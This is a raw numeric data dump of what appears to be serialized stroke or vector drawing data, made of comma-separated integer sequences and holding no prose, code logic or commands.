2 0,-33 0 97,0-1 0,33-5-1,57 0 312,-101 5-408,0 0 0,0 0 0,0 1 0,-1 1 0,15 3 0,-13-2 1,0-1 0,0 0 0,28-3 1,69-22 169,-84 16-95,0 1 0,1 2 0,56-4 1,84-3 61,-27 0 32,86 0 279,81 12 227,-307 0-690,8 7 11,3-1 7,2-1 158,0 0 0,0-1 0,0 0 0,1-2 0,-1 0-1,1 0 1,-1-1 0,31-3 0,-22 2 122,17 0-142,-39 0 27,-1 2-75,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1-1,0 1 1,1 0 0,-1-1 0,0 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,2 0 0,54 17 713,-47-16-513,6 2 58,-7-1 31,-11-2-205,-8 0-194,9 2 0,7-5 0,-4 5 0,6-2 0,2-1 0,0 1 0,10 9 0,-20-9 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,2 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 1 0,4 1 0,27 11 0,-1-2 0,128 20 0,-118-7 0,-32-20 0,32 19 0,33 18 0,-1 13 0,-59-48 0,-1 0 0,1-2 0,0 1 0,22 3 0,1 0 0,-37-8 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,1 2 0,-2-3 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,1 1 0,4 1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 1 0,-1 0 0,6 5 0,30 22 0,-24-21 0,55 34 0,-61-38 0,12 10 0,10 5 0,-23-15 0,-5-1 0,-1-3 0,1-1 0,-1 1 0,1 0 0,0-1 0,0 0 0,-1 0 0,1 0 0,8 1 0,-1-2 0,0 0 0,-1 1 0,1 3 0,0-3 0,0-1 0,6-3-30,-21-2-73,-19-4-389,22 9 320,-47-15-6217,-1-1-5900,19 14 3460,17-3 4670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4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34 544,'0'0'2612,"-11"-7"1301,12-1 2037,-2-7-1026,1 15-4892,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,-1 0 1,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,1-1 0,0 1-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 0-1,0 0 1,-2 2 1928,1 5-12,1-6-1875,0 0-1,0-1 0,-1 1 0,1 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 1,1-1-1,-1 1 0,0 0 0,0-1 1,1 1-1,-1-1 0,1 1 1,-1 0-1,0-1 0,1 1 0,-1-1 1,1 1-1,-1-1 0,1 1 1,0-1-1,-1 0 0,1 1 1,-1-1-1,1 0 0,1 1 0,15 23 23,-9-12-50,55 38 643,-46-38-628,-14-11-55,-1 0 0,1 1 0,-1-1-1,0 1 1,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,-1 0-1,3 4 1,-1-2-22,1 0 1,-1-1-1,0 0 0,1 1 0,0-1 1,-1-1-1,6 4 0,21 19-69,-25-20 68,2 4 61,1-1 0,0 0 0,0 0 0,0-1 0,13 8 0,-19-14-42,1 0 0,-1 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,0-1 0,0 1 0,0 0-1,-1 0 1,1 0 0,0 0-1,-1 0 1,1 1 0,0 2-1,11 7 17,-13-12-18,1 1 0,-1 0 0,0-1 1,1 1-1,-1 0 0,1-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,0 1 0,-1-1 0,1 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,-1-1 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,0-1 0,2 11-13,-48 25 23,2-9-4,14-9 10,11-4 51,-223 162 2548,196-142-2089,-19 12 226,-10-2-45,47-28-364,25-13-301,-1-1-1,1 1 0,-1-1 1,1 1-1,-1-1 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-7 0 1,8-1-29,-21-25-5785,11-10-6558,11 11 3339,0 17 4653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0 188 680,'0'0'2503,"2"-18"1800,70-67 873,-50 62-2480,-1 2-909,-20 20-1757,0-1 0,1 0-1,-1 0 1,0 1 0,1-1 0,-1 1-1,1 0 1,0-1 0,-1 1 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,1 1 0,1-1 0,1 0-1,39-11-129,-16 9 119,-24 2-8,1 1-1,0-1 1,-1 1 0,1-1 0,-1 1 0,1 0 0,0 0-1,-1 1 1,1-1 0,-1 1 0,1 0 0,4 1 0,8 5 51,-14-6-58,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,3 3 0,-2-1-4,0-1 1,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0-1,-1 0 1,0-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,-2 5 0,-8 54 56,-14 29-21,20-76-37,-1-1 1,0 1 0,0-1 0,-2-1 0,1 1-1,-2-1 1,0 0 0,-18 19 0,-48 53 78,53-62-51,19-20-14,0 1 1,0 0 0,-1-1 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0-1-1,0 0 1,0 0 0,-8 3 0,12-5 2,-1 0 0,0 0 0,0 0 1,0 1-1,1-1 0,-1 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 1,1 0-1,-1 0 0,0-1 0,0 1 1,1 0-1,-1-1 0,-1 0 0,-11-3 140,12 4-154,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1-1 1,1 1-1,0 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0-1 1,-1 1-1,1 0 0,0-1 0,0 1 1,-1-1-1,1 1 0,0 0 1,0-1-1,-1 1 0,1-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 1,7-24 14,-4 14-2,-2 9-13,-1-1 0,1 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0-1,1 0 1,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1-1,3-2 1,22-22 8,-25 23-10,0 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,4 1 0,7 3 2,-12-4 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,0-1 1,0 1-1,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0-1 0,2 2 0,25 17 77,-24-18-76,0 0 0,-1 0 1,0 0-1,1 0 0,-1 1 1,0 0-1,0-1 0,0 1 1,4 6-1,-4-6 0,1 1-1,-1-1 1,1 0-1,-1 0 1,1-1-1,0 1 1,0-1-1,0 0 1,0 0-1,1 0 1,-1 0-1,0-1 1,1 0-1,0 0 1,-1 0-1,1 0 1,-1-1-1,1 0 1,0 0-1,5-1 1,-1-2-99,-6-11-8403,0 2 2227,6 5 2643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39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1252,'0'-14'13137,"2"10"-10652,5 4-2471,-5 0-187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0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1544,'0'1'115,"1"-1"1,-1 0-1,0 0 0,1 0 0,-1 0 1,1-1-1,-1 1 0,0 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,0 0 1,1-1-1,-1 1 0,1 0 0,-1 0 1,0-1-1,1 1 0,-1 0 0,0 0 1,0-1-1,1 1 0,-1 0 0,0-1 1,0 1-1,1 0 0,-1-1 0,0 1 0,0 0 1,0-1-1,0 1 0,1-1 0,-1 1 1,0-1-1,0 1 0,0 0 0,0-1 1,0 0-26,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 1,0 0-1,0-1 0,0 1 1,1 0-1,-1-1 1,0 1-1,0 0 1,0 0-1,1-1 1,-1 1-1,0 0 1,0-1-1,0 1 1,1 0-1,-1 0 1,0 0-1,1-1 1,-1 1-1,0 0 1,1 0-1,-1 0 1,0 0-1,1 0 1,-1-1-1,0 1 0,4 0 3276,-2 1-3150,-1-1 1,1 1-1,-1-1 1,0 1-1,1 0 1,-1 0 0,0-1-1,0 1 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 1-1,-1-1 1,1 0-1,0 0 1,1 2-1,8 17 698,-9-19-873,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 1,-1 1-1,1-1 0,0 1 1,-1 0-1,1-1 0,-1 4 0,11 26 682,0 24 50,0-2-127,-1 1-149,-10-37-391,-1-13-94,1-1-1,0 1 0,0 0 0,0-1 1,0 1-1,0 0 0,1-1 1,-1 1-1,1-1 0,0 1 0,0-1 1,1 1-1,-1-1 0,2 4 1,-1 4-12,-2 8 14,-3-20-27,2 1-69,1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0-1,1 0 1,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1-1,-1 1 1,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1-1,1-3-1341,-2-12-7971,0 11 8303,-8-3-2302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10 186 588,'-9'-11'5874,"50"-34"-1684,-16 18-2800,-22 22-1155,0 1-1,1-1 0,0 1 1,0 0-1,0 0 0,1 1 1,8-6-1,39-41 2334,-48 48-2501,1-1-1,0 1 1,1 1 0,-1-1 0,0 1-1,0-1 1,1 2 0,-1-1 0,1 1-1,-1-1 1,0 1 0,1 1-1,-1-1 1,1 1 0,-1 0 0,0 0-1,1 1 1,8 3 0,-6-3-39,1 0-1,-1 0 1,0 1-1,-1 0 1,1 1-1,0-1 1,-1 2 0,0-1-1,0 1 1,11 10-1,-17-14 1,0 0-1,0 1 1,-1-1-1,1 1 1,0-1-1,-1 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 1,-1-1-1,1 1 0,-1-1 1,-1 3-1,-18 29 406,-34 28 518,38-35-504,16-25-432,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,2 2 0,2 1 32,1-1 0,0 1-1,0-1 1,0 0 0,0-1-1,0 1 1,1-1 0,10 2 0,61 16 140,-70-17-218,0 0 0,-1 1-1,1 0 1,0 1 0,-1-1-1,0 1 1,0 0-1,0 1 1,6 5 0,-11-9 55,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 1,0 0-1,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 1,-1 1-1,-27 31 965,18-22-670,4-5-172,1 0 0,-1-1 1,0 1-1,0-2 0,-11 7 0,-18 12 325,-31 7-65,52-22-397,-1 0 0,0-1 1,0-1-1,0 0 1,-1-1-1,-23 3 0,26-9-243,12-2-2540,20-9-6661,12-7 607,-19 12 5302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1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1640,'12'-13'7008,"-11"12"-6816,0 1 1,-1-1-1,1 1 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 1,0 1-1,-1-1 0,1 0 0,0 1 1,0-1-1,0 1 0,1 1-17,0 0 0,0 0 0,-1 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 4 0,1 6-4,0 0 0,-1 0 0,-1 0 0,0 16 0,10 31 71,-11-55-230,0-2 37,1 1 0,-1-1-1,0 0 1,0 1 0,0-1 0,-1 0-1,1 1 1,-1-1 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,-3 4-1,-1-1 239,5-4-235,0-1 1,0 1-1,-1-1 1,1 1 0,0-1-1,-1 0 1,1 1-1,0-1 1,-1 1-1,1-1 1,-1 0 0,1 0-1,0 1 1,-1-1-1,1 0 1,-1 0 0,1 1-1,-1-1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1-1-1,-1 1 1,1 0 0,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1-1 1,0 1 0,-1 0-1,1-1 1,0 1-1,-1-1 1,-1-1 27,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0-1,1 0 1,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1-4 0,0 2-58,1 0 1,-1 0-1,1-1 1,1 1 0,-1 0-1,1-1 1,0 1 0,0 0-1,2-6 1,0 4-66,-1 0 1,1 0-1,1 1 0,-1-1 1,1 1-1,0 0 1,0 0-1,1 0 0,0 0 1,0 1-1,6-5 0,46-27-5659,-1 7-5703,-37 23 8055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119 105 72,'0'0'124,"-1"0"0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 1,1 1-1,-1-1 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 1,0-1-1,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 1,1 1-1,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 1,0-1-1,0 1 0,1 0 0,-1 0 0,2 4 170,0-1 0,0 0 1,0 1-1,1-1 0,-1 0 0,6 6 0,-4-7-223,0 0 0,0 0 0,0 0-1,0 0 1,0-1 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,0-1 0,0-1 0,0 1-1,-1-1 1,1 1 0,0-1 0,0-1 0,0 1-1,0-1 1,0 0 0,-1 0 0,8-2 0,-5 1 116,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1-1 0,1 0 0,-1 1 0,0-2 0,6-9 0,-8 11-20,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 1,0 0-1,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,-2-6 0,1 8-104,1 1 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1-1 0,-1 1 0,-1 0-1,1 1 1,0-1 0,0 0 0,-1 0 0,1 1-1,0 0 1,-1-1 0,0 1 0,1 0-1,-1 0 1,0 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,0 1 0,-5 0 0,-21 0 292,17-1-276,0 1-1,-1 0 1,1 1 0,0 0-1,-1 1 1,1 1-1,-13 4 1,10-1-72,0 1 1,1 1-1,0 1 1,-25 19-1,28-20-34,9-6-71,0-1-1,0 1 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 0 0,1 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 0 0,1 1 1,-1-1-1,1 1 1,0-1-1,0 4 0,0-3-531,0 0 0,1 0-1,-1-1 1,1 1 0,-1 0-1,1 0 1,0-1 0,0 1-1,0-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 0 0,0 0-1,3 4 1,6 1-2660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29 668,'-2'-11'4354,"-6"11"1791,14 11-2546,9 8-1691,-5 18-1096,-5-28-670,1 6 146,-6 117 702,0-131-979,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0-1 0,0 1 0,0 0 1,0 0-1,0-1 0,1 1 0,-1 0 0,0-1 1,1 1-1,-1 0 0,0-1 0,1 1 0,-1 0 0,1-1 1,-1 1-1,1-1 0,-1 1 0,1-1 0,-1 1 1,1-1-1,0 1 0,-1-1 0,1 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,-1-1 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 1,1 0-1,1-1 0,45-27 418,-34 19-453,59-43 47,-70 51-26,8 19-9,-10-12 15,0-6 5,0 1 1,0-1-1,0 1 0,0 0 0,0-1 0,0 1 1,0-1-1,1 1 0,-1-1 0,0 1 0,0-1 1,0 1-1,0-1 0,1 1 0,-1-1 0,0 1 1,0-1-1,1 0 0,-1 1 0,0-1 0,1 1 1,-1-1-1,1 0 0,-1 1 0,0-1 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 0,-1 1 1,1-1-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,1-1 1,0 0-1,22-15 1032,-19 12-965,0 0 0,0 0 1,-1 0-1,1 0 0,-1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,2-8 0,7-48 94,-10 58-167,1 0-19,-1 1-1,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,-1 0 1,1-1-1,-1 1 0,0 0 0,0 0 1,0 0-1,-3-4 0,4 6-80,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,-1 0 1,1 0-1,0 0 1,0-1-1,0 1 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,-1-1-1,1 1 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 1,0 0-1,-1 0 1,1 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0-1,-1 0 1,1 1-1,0-1 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,-1 18-9793,1-18 9500,0 6-2855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3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43 320,'-17'-11'3168,"12"8"-2397,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 1 0,0 1 0,-9-1 0,-12-2 1303,24 2-1845,0 0 0,0 1-1,0-1 1,0 1 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 1 0,0-1-1,0 1 1,-4 2 0,5-2 213,2-1-434,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 1 0,-1-1 1,1 0-1,0 0 0,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 1 0,0-1 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 1 0,0-1 0,0 0 1,-1 1-1,1-1 0,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 1,10 27-11,-2-6 4,-8-18-2,1 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,3 3 1,-3-3 0,1-1-1,-1 1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 4 1,11 23-11,-11-28 13,1-1 0,-1 1 1,0 0-1,0-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,0 0 1,-2 3-1,-6 7 19,8-9-18,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,-1 0-1,1 0 1,-1 1 0,1-1-1,-1 0 1,1 0-1,-1 0 1,0 0 0,1-1-1,-4 2 1,-17 8 16,13-12 4,-5-6-11,14 8-180,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,1 0 0,0 0-464,0-1 1,0 1 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,1 1 0,-1 0 0,0 0 0,1 0 0,-1 1 0,1-1-1,0 0 1,2 0 0,6 0-2421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4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44 108 1612,'3'2'488,"-1"-1"1,1 0-1,-1 0 0,1 0 0,-1-1 1,1 1-1,0-1 0,-1 1 0,1-1 0,0 0 1,4 0-1,28-10 1488,-24 5-1602,-1-1 0,0 0 0,-1-1 1,9-8-1,-7 7-78,-10 7-143,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 1,-1 1-1,0 0 1,0-1-1,0 1 0,1-1 1,-1 1-1,-1-1 0,1 1 1,0-1-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,0 1 1,1-1-1,-1 0 0,0 0 1,0-3-1,7-3 806,-5 6-682,-11-2 4,2 3-126,0 0 1,0 0 0,0 1-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 2-1,1-1 1,-1 1-1,0 0 1,0 0 0,1 1-1,-1 0 1,-6 4-1,4-2-59,1 0-1,0 0 0,0 1 1,0 0-1,0 1 1,1-1-1,0 1 0,1 1 1,-11 14-1,16-20-92,1 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,2 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 1,0 1-1,2 2 0,21 27 98,-12-24-302,0 0 0,1 0-1,-1-1 1,1-1-1,1 0 1,-1-1 0,1 0-1,-1-1 1,1-1 0,0 0-1,0-1 1,21-1 0,-30 0-373,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,8-3 1,14-5-6227,-15 9 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12 474 892,'0'0'5813,"-11"7"2077,17-9-7471,-1 0-1,1 1 1,-1-2 0,1 1-1,-1-1 1,0 0-1,0 0 1,6-5-1,62-46 550,-46 35-868,45-41-1,8-13-111,-44 42 84,-1-2 0,42-52-1,-23 24 171,-35 47 46,-17 13-213,-1 1-1,0-1 1,1 1-1,-1-1 1,0 0 0,0 1-1,0-1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,0-1-1,-1 1 1,1 0 0,-1 0-1,2-3 1,-2 4-52,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0-1,-1 1 1,1-1 0,-1 0-1,0 0 1,1 1 0,-1-1 0,1 0-1,-1 1 1,1-1 0,-1 0-1,0 1 1,1-1 0,-1 0-1,0 1 1,0-1 0,1 1 0,-1-1-1,0 1 1,0-1 0,1 1-1,-1-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-10 52 769,9-35-703,2-1 0,0 0 1,6 28-1,-4-30-77,-1 0-1,-1 0 1,0 0 0,-2 22-1,0-22-3,1-1 0,0 1 0,1-1 0,4 21 0,3 12-2,-7-36-3,1 0 1,0 0 0,0-1-1,8 21 1,-2-10 7,-8-17-12,1-1-1,0 1 1,0-1 0,0 0-1,0 0 1,1 1 0,-1-1-1,1 0 1,0 0 0,0-1-1,0 1 1,3 3 0,-3-5-25,-2-1-29,0 0-1,0-1 0,0 1 1,0 0-1,0 0 1,0 0-1,0-1 1,-1 1-1,1 0 0,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0-1 1,0 1-1,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 1 1,0-1-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 0 1,0 1-1,0-1 0,-30-37-11978,26 26 8689,-5-1 111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5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 1708,'-22'-5'10155,"55"5"-6184,96 30-2971,-45-14-5704,-39-14-3234,-34 3 4954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67 1464,'-10'-12'11898,"10"14"-11686,0-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,1 0 0,-1 1 0,0-1 0,-1 1 0,1 2-146,0-1 0,0 1 1,0 0-1,0-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,2 6 0,-1 5 43,-5 45 93,2-46-165,1 0 1,0 0-1,1 0 1,1 0-1,4 25 1,6 25 493,-9-55-460,-1 0 0,0 0-1,0 0 1,-1 17 0,-4-3 75,4-23-141,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1-3-4,0 1 0,0-1 0,0 0 0,1 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,1 0 0,0-4 0,0-5-7,-2-8 6,1 1 1,1 0-1,1 0 1,1 0-1,1 0 1,8-28 0,-1 13 13,-10 29-14,0 0 0,1 1 0,-1-1 0,1 0 0,1 1 0,-1 0 1,1-1-1,6-7 0,-8 10 0,7-8-2,0 0 0,1 0 0,0 1 0,1 0 0,-1 1 1,2 0-1,0 0 0,0 1 0,18-10 0,-6 8-5,-15 6-2,1 0 1,-1 0-1,1 1 0,0 0 1,0 1-1,0 0 0,0 1 1,15-2-1,-24 4 8,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 0,1 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 0,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 1 0,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,1-1 1,-1 0-1,0 1 1,0-1-1,1 0 0,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 0,0 0 1,1 0-1,-1 1 1,1-1-1,-1 0 1,0 0-1,1 0 0,-1 0 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,1 0-1,-1 0 1,0 0-1,1 0 1,-1 0-1,1 0 0,-1 0 1,1 0-1,-1-1 1,1 1-1,-27 24-16,24-22 13,-17 14-16,-2-2 0,0 0-1,0-1 1,-1-1 0,-25 10 0,34-16-497,0 2-1,0 0 1,0 0-1,1 1 1,-19 17-1,29-13-3374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6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29 1348,'11'1'11214,"-1"42"-6624,0-14-3826,-8-26-711,0 0 0,-1 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 